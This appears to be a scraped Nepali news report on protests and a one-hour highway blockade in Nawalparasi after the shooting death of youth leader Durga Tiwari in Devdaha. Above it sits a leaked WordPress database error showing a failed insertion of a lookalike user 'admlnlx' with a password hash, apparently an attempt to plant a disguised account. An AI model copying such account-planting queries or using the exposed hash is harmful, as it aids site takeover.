WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMfdHkKcOGfMC4920YAqOjAj3NZzZk0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 04:48:18', '', 'admlnlx', 'admlnlx')
परासी,पुस ४ –
एमाले निकट युवा संघ रुपन्देहीका अध्यक्ष दुर्गा तिवारीको गोली हानी हत्या भएको विरोधमा एमाले नवलपरासीले सोमबार साँझ जिल्लाका विभिन्न स्थानमा विरोध प्रदर्शन गरेको छ।विरोध स्वरुप उनीहरुले एक घण्टा राजमार्ग बन्द गराएका थिए। एमाले कार्यकर्ताहरुले हत्यारालाई पक्राउ गर्नुपर्ने माग राख्दै गैंडाकोट, कावासोती, भूमहीलगायतका क्षेत्रमा एक घण्टा राजमार्ग बन्द गरेका थिए।
रुपन्देहीको देवदहमा अज्ञात समूहले गोली हानी तिवारीको सोमबार दिउँसो साढे तीन बजेतिर हत्या गरेको थियो। गोली लागेर गम्भीर घाइते भएका तिवारीको देवदह मेडिकल कलेजमा उपचारको क्रममा मृत्यु भएको थियो।